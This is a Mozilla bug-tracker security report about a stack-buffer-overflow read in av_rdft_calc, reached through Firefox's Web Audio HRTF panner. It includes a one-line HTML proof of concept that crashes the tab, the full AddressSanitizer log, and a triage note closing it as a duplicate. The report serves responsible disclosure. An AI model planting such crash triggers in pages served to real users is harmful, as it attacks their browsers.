Closed Bug 1881947 Opened 1 year ago Closed 1 year ago

StackOverflow in av_rdft_calc

Categories

(Core :: Web Audio, defect)

Product:
Core
Component:
Web Audio
Version:
Firefox 125
Type:
defect

Tracking

()

Status:
RESOLVED DUPLICATE of bug 1879676

People

(Reporter: bin7o8v, Unassigned)

Details

(Keywords: reporter-external)

User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0

Steps to reproduce:

UserAgent: Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0

  1. use command "fuzzfetch -a" get the last asan build.
  2. serve poc.html at port 8080.
  3. run command "./firefox http://127.0.0.1:8080/poc.html".

poc.html

<script>
    (new AudioContext()).createPanner().panningModel = "HRTF";
</script>

Actual results:

Tab crashed.

asan log:

==17631==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7f1a269fdfc0 at pc 0x7f1a26ad7d22 bp 0x7f1a269fda00 sp 0x7f1a269fd9f8
READ of size 4 at 0x7f1a269fdfc0 thread T30
type=http, flags=0
type=http, flags=0
type=http, flags=0
type=http, flags=0
type=http, flags=0
type=http, flags=0
#0 0x7f1a26ad7d21 in av_rdft_calc /builds/worker/checkouts/gecko/media/ffvpx/libavcodec/avfft.c:172:9
#1 0x7f1ac91150d5 in GetInverse /builds/worker/workspace/obj-build/dist/include/mozilla/FFTBlock.h:106:5
#2 0x7f1ac91150d5 in extractAverageGroupDelay /builds/worker/checkouts/gecko/dom/media/webaudio/blink/HRTFKernel.cpp:46:19
#3 0x7f1ac91150d5 in WebCore::HRTFKernel::HRTFKernel(float*, unsigned long, float) /builds/worker/checkouts/gecko/dom/media/webaudio/blink/HRTFKernel.cpp:62:18
#4 0x7f1ac9113a21 in create /builds/worker/checkouts/gecko/dom/media/webaudio/blink/HRTFKernel.h:117:11
#5 0x7f1ac9113a21 in WebCore::HRTFElevation::calculateKernelForAzimuthElevation(int, int, SpeexResamplerState_, float) /builds/worker/checkouts/gecko/dom/media/webaudio/blink/HRTFElevation.cpp:153:10
#6 0x7f1ac91103ae in WebCore::HRTFElevation::createBuiltin(int, float) /builds/worker/checkouts/gecko/dom/media/webaudio/blink/HRTFElevation.cpp:225:38
#7 0x7f1ac910fda1 in WebCore::HRTFDatabase::HRTFDatabase(float) /builds/worker/checkouts/gecko/dom/media/webaudio/blink/HRTFDatabase.cpp:55:9
#8 0x7f1ac9112bbe in create /builds/worker/checkouts/gecko/dom/media/webaudio/blink/HRTFDatabase.cpp:45:40
#9 0x7f1ac9112bbe in WebCore::HRTFDatabaseLoader::load() /builds/worker/checkouts/gecko/dom/media/webaudio/blink/HRTFDatabaseLoader.cpp:165:20
#10 0x7f1ac9112ebd in WebCore::databaseLoaderEntry(void) /builds/worker/checkouts/gecko/dom/media/webaudio/blink/HRTFDatabaseLoader.cpp:158:11
#11 0x7f1ae02d211f in _pt_root /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:201:5
#12 0x5612afc134ca in asan_thread_start(void*) /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_interceptors.cpp:225:31
#13 0x7f1ae0094ac2 in start_thread nptl/pthread_create.c:442:8
#14 0x7f1ae012684f misc/../sysdeps/unix/sysv/linux/x86_64/clone3.S:81

Address 0x7f1a269fdfc0 is located in stack of thread T30 at offset 1056 in frame
#0 0x7f1ac91132b7 in WebCore::HRTFElevation::calculateKernelForAzimuthElevation(int, int, SpeexResamplerState_*, float) /builds/worker/checkouts/gecko/dom/media/webaudio/blink/HRTFElevation.cpp:98

This frame has 4 object(s):
[32, 1056) 'response' (line 112) <== Memory access at offset 1056 overflows this variable
[1184, 3248) 'resampled' (line 120)
[3376, 3380) 'in_len' (line 130)
[3392, 3396) 'out_len' (line 131)
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
(longjmp and C++ exceptions are supported)
Thread T30 created by T0 (Isolated Web Co) here:
type=http, flags=0
type=http, flags=0
type=http, flags=0
#0 0x5612afbfcc6d in pthread_create /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_interceptors.cpp:237:3
#1 0x7f1ae02c0844 in _PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:458:14
#2 0x7f1ae02ae43e in PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:533:12
#3 0x7f1ac9111fbe in loadAsynchronously /builds/worker/checkouts/gecko/dom/media/webaudio/blink/HRTFDatabaseLoader.cpp:183:28
#4 0x7f1ac9111fbe in WebCore::HRTFDatabaseLoader::createAndLoadAsynchronouslyIfNecessary(float) /builds/worker/checkouts/gecko/dom/media/webaudio/blink/HRTFDatabaseLoader.cpp:66:11
#5 0x7f1ac90dae9f in CreateHRTFPanner /builds/worker/checkouts/gecko/dom/media/webaudio/PannerNode.cpp:102:9
#6 0x7f1ac90dae9f in mozilla::dom::PannerNode::SetPanningModel(mozilla::dom::PanningModelType) /builds/worker/checkouts/gecko/dom/media/webaudio/PannerNode.cpp:350:55
#7 0x7f1ac526044c in mozilla::dom::PannerNode_Binding::set_panningModel(JSContext*, JS::Handle<JSObject*>, void*, JSJitSetterCallArgs) /builds/worker/workspace/obj-build/dom/bindings/./PannerNodeBinding.cpp:482:24
#8 0x7f1ac6bfec8d in bool mozilla::dom::binding_detail::GenericSetter<mozilla::dom::binding_detail::NormalThisPolicy>(JSContext*, unsigned int, JS::Value*) /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3206:8
#9 0x7f1ad06f6115 in CallJSNative /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:480:13
#10 0x7f1ad06f6115 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:574:12
#11 0x7f1ad06f8206 in InternalCall /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:641:10
#12 0x7f1ad06f8206 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:673:8
#13 0x7f1ad06fa283 in js::CallSetter(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::Handle<JS::Value>) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:804:10
#14 0x7f1ad0b0ac37 in SetExistingProperty(JSContext*, JS::Handle<JS::PropertyKey>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::Handle<js::NativeObject*>, js::PropertyResult const&, JS::ObjectOpResult&) /builds/worker/checkouts/gecko/js/src/vm/NativeObject.cpp:2655:8
#15 0x7f1ad0b07715 in bool js::NativeSetProperty<(js::QualifiedBool)1>(JSContext*, JS::Handle<js::NativeObject*>, JS::Handle<JS::PropertyKey>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::ObjectOpResult&) /builds/worker/checkouts/gecko/js/src/vm/NativeObject.cpp:2689:14
#16 0x7f1ad0715004 in SetProperty /builds/worker/checkouts/gecko/js/src/vm/ObjectOperations-inl.h:305:10
#17 0x7f1ad0715004 in SetObjectElementOperation /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:1594:10
#18 0x7f1ad0715004 in js::Interpret(JSContext*, js::RunState&) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:2807:12
#19 0x7f1ad06f4e97 in MaybeEnterInterpreterTrampoline /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:394:10
#20 0x7f1ad06f4e97 in js::RunScript(JSContext*, js::RunState&) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:452:13
#21 0x7f1ad06fa7a3 in js::ExecuteKernel(JSContext*, JS::Handle<JSScript*>, JS::Handle<JSObject*>, js::AbstractFramePtr, JS::MutableHandle<JS::Value>) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:839:13
#22 0x7f1ad08cf515 in JS_ExecuteScript(JSContext*, JS::Handle<JSScript*>) /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:518:10
#23 0x7f1ac46ff6f9 in mozilla::dom::JSExecutionContext::ExecScript() /builds/worker/checkouts/gecko/dom/base/JSExecutionContext.cpp:234:8
#24 0x7f1acaecf790 in ExecuteCompiledScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2503:16
#25 0x7f1acaecf790 in mozilla::dom::ScriptLoader::EvaluateScript(nsIGlobalObject*, JS::loader::ScriptLoadRequest*) /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2792:12
#26 0x7f1acaecd888 in mozilla::dom::ScriptLoader::EvaluateScriptElement(JS::loader::ScriptLoadRequest*) /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2572:10
#27 0x7f1acaec30a1 in mozilla::dom::ScriptLoader::ProcessRequest(JS::loader::ScriptLoadRequest*) /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2215:10
#28 0x7f1acaebf131 in mozilla::dom::ScriptLoader::ProcessInlineScript(nsIScriptElement*, JS::loader::ScriptKind) /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1464:10
#29 0x7f1acaea6c0d in mozilla::dom::ScriptLoader::ProcessScriptElement(nsIScriptElement*) /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1053:10
#30 0x7f1acaea5c7b in mozilla::dom::ScriptElement::MaybeProcessScript() /builds/worker/checkouts/gecko/dom/script/ScriptElement.cpp:195:18
#31 0x7f1ac312e09d in AttemptToExecute /builds/worker/workspace/obj-build/dist/include/nsIScriptElement.h:224:18
#32 0x7f1ac312e09d in nsHtml5TreeOpExecutor::RunScript(nsIContent*, bool) /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:957:22
#33 0x7f1ac312820f in nsHtml5TreeOpExecutor::RunFlushLoop() /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:742:7
#34 0x7f1ac3135b4e in nsHtml5ExecutorFlusher::Run() /builds/worker/checkouts/gecko/parser/html/nsHtml5StreamParser.cpp:173:18
#35 0x7f1ac0cba39a in mozilla::RunnableTask::Run() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:578:16
#36 0x7f1ac0ca2e5b in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock<mozilla::Mutex&> const&) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:905:26
#37 0x7f1ac0c9fa38 in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock<mozilla::Mutex&> const&) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:728:15
#38 0x7f1ac0ca0139 in mozilla::TaskController::ProcessPendingMTTask(bool) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:514:36
#39 0x7f1ac0cc2491 in operator() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:232:37
#40 0x7f1ac0cc2491 in mozilla::detail::RunnableFunction<mozilla::TaskController::TaskController()::$_0>::Run() /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.h:548:5
#41 0x7f1ac0cea41f in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1199:16
#42 0x7f1ac0cf815a in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:480:10
#43 0x7f1ac27bdf98 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:85:21
#44 0x7f1ac26027aa in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:370:10
#45 0x7f1ac26027aa in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:363:3
#46 0x7f1ac26027aa in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:345:3
#47 0x7f1acb4bcc29 in nsBaseAppShell::Run() /builds/worker/checkouts/gecko/widget/nsBaseAppShell.cpp:148:27
#48 0x7f1acb6c5152 in nsAppShell::Run() /builds/worker/checkouts/gecko/widget/gtk/nsAppShell.cpp:470:33
#49 0x7f1ad03125ee in XRE_RunAppShell() /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:712:20
#50 0x7f1ac26027aa in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:370:10
#51 0x7f1ac26027aa in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:363:3
#52 0x7f1ac26027aa in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:345:3
#53 0x7f1ad0311c75 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:647:34
#54 0x5612afc56e6b in content_process_main /builds/worker/checkouts/gecko/browser/app/../../ipc/contentproc/plugin-container.cpp:57:28
#55 0x5612afc56e6b in main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:375:18
#56 0x7f1ae0029d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16

SUMMARY: AddressSanitizer: stack-buffer-overflow /builds/worker/checkouts/gecko/media/ffvpx/libavcodec/avfft.c:172:9 in av_rdft_calc
Shadow bytes around the buggy address:
0x7f1a269fdd00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x7f1a269fdd80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x7f1a269fde00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x7f1a269fde80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x7f1a269fdf00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x7f1a269fdf80: 00 00 00 00 00 00 00 00[f2]f2 f2 f2 f2 f2 f2 f2
0x7f1a269fe000: f2 f2 f2 f2 f2 f2 f2 f2 00 00 00 00 00 00 00 00
0x7f1a269fe080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x7f1a269fe100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x7f1a269fe180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x7f1a269fe200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==17631==ABORTING

Expected results:

Tab should not crash.

The Bugbug bot thinks this bug should belong to the 'Core::Web Audio' component, and is moving the bug to that component. Please correct in case you think the bot is wrong.

Component: Untriaged → Web Audio
Product: Firefox → Core
Group: media-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 1 year ago
Duplicate of bug: 1879676
Resolution: --- → DUPLICATE

Thanks for reporting, I've duped it against our similar internal report for the same problem.

Sorry for the burst of bugspam: filter on tinkling-glitter-filtrate
Adding reporter-external keyword to security bugs found by non-employees for accounting reasons

Keywords: reporter-external
Group: media-core-security
You need to log in before you can comment on or make changes to this bug.